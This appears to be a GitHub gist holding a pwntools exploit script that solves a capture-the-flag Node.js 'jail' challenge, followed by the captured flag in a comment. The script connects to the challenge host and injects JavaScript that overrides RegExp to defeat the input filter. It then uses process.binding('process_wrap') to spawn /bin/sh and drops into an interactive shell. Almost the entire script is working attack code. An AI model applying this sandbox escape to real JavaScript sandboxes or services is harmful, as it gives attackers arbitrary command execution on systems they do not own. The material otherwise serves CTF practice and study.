Skip to content

Instantly share code, notes, and snippets.

@bennofs
Created September 15, 2017 14:11
Show Gist options
  • Save bennofs/d421360d05ed059a3d96acbae2392a29 to your computer and use it in GitHub Desktop.
Save bennofs/d421360d05ed059a3d96acbae2392a29 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
from pwn import *
badchars = "[]\."
regex_nop = '''function(){ return {"test": function() { return false; }}}'''
def run(conn, payload):
payload = payload.strip().replace("\n", ";")
conn.sendlineafter("Phone #> ", 'hangup=function(){};' + payload.strip() + "; ask()")
def initialize():
conn = remote("jail.alieni.se", 55542)
# remove the check
run(conn, "RegExp=" + regex_nop)
run(conn, '''process.on('uncaughtException', (err) => {{
console.log(err);
console.log("{}")
ask();
}});
'''.format("-" * 60).replace(" ", ""))
return conn
script = '''
var Process = process.binding("process_wrap").Process;
p = new Process();
p.onexit = function(exitCode, signalCode) {};
p.spawn({ file: "/bin/sh", stdio: [{type: "fd", fd: 0}, {type: "fd", fd: 1}, {type: "fd", fd: 2}]});
'''
conn = initialize()
run(conn, script)
conn.interactive()
# flag = SECT{1ts_1n_th4T_pl4Ce_Wh3re_1_Pu7_tH4t_Th1ng_th4T_t1m3,}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment